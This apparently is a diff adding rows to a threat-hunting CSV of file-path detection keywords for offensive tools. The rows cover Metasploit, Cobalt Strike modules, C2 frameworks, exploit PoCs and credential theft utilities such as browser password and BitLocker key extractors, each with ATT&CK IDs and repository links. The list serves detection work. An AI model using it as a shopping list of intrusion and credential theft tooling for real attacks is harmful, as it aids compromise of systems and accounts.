+"*/ExeStager/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 
- TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*/expl/expl.go*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z"
+"*/exploit.cron.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/exploit.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit.ldpreload.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/exploit.pbj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit/linux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit/remote/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/exploit_orw.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z"
+"*/exploits/*.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*/exports_function_hid.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z"
+"*/ExternalC2/*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*/ExternalC2/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/ExtractBitlockerKeys.git*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z"
+"*/f5_bigip_tmui_rce.rb*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z"
+"*/Fa1c0n35/zabbix-cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z"
+"*/fake.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - 
T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*/fakelogonscreen*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z"
+"*/fake-sms.git*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z"
+"*/Farmer.git*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*/fastfuz-chrome-ext*","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","23","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z"
+"*/fb_firstlast.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z"
+"*/fb-brute.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
+"*/fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/febinrev/dirtypipez-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z"
+"*/fern-wifi-cracker/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ffuf.git*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*/ffuf/ffufrc*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*/fiesta.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
+"*/fiesta2.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
+"*/FilelessPELoader*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*/final_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 
- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
+"*/find_domain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*/find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/FindModule.c*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z"
+"*/FindObjects.cna*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z"
+"*/FindSQLSrv.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*/finger.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/fingerprint-strings.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/firefox_decrypt.git*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z"
+"*/firefox_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*/firewalk.nse*","offensive_tool_keyword","nmap","Nmap 
NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/firewall-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/flask:5000/supershell/*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"*/flatten-macho.m*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Fodetect-hooksx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z"
+"*/follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z"
